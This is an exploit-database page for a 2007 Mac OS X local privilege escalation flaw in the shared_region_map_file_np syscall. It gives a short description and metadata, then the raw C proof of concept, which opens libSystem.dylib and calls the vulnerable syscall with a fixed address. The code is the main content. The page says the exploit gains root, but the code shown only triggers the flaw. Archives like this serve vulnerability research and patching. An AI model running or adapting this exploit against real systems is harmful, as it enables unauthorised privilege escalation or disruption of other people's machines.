header-logo
Suggest Exploit
vendor:
Mac OS X
by:
Adriano Lima
7.5
CVSS
HIGH
Local Privilege Escalation
Unknown
CWE
Product Name: Mac OS X
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE:
CPE: Unknown
Metasploit:
Other Scripts:
Platforms Tested:
2007

Shared Region Map File NP Local Privilege Escalation Vulnerability

This exploit takes advantage of a vulnerability in the shared_region_map_file_np function in Mac OS X. By opening the libSystem.dylib file and calling the shared_region_map_file_np syscall with a specific address, an attacker can escalate their privileges to gain root access.

Mitigation:

Unknown
Source

Exploit-DB raw data:

/*
This vulnerability was discovered by Adriano Lima
<adriano@risesecurity.org>.

REFERENCES

[1] Mac OS X Internals: A Systems Approach By Amit Singh

DISCLAIMER

The authors reserve the right not to be responsible for the topicality,
correctness, completeness or quality of the information provided in this
document. Liability claims regarding damage caused by the use of any
information
provided, including any kind of information which is incomplete or
incorrect,
will therefore be rejected.
*/


#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <unistd.h>

int main(int argc,char **argv){
   int fd;

   if((fd=open("/usr/lib/libSystem.dylib",O_RDONLY))==-1){
       perror("open");
       exit(EXIT_FAILURE);
   }

   if(syscall(SYS_shared_region_map_file_np,fd,0x02000000,NULL,NULL)==-1){
       perror("shared_region_map_file_np");
       exit(EXIT_FAILURE);
   }

   exit(EXIT_FAILURE);
}

// milw0rm.com [2007-01-21]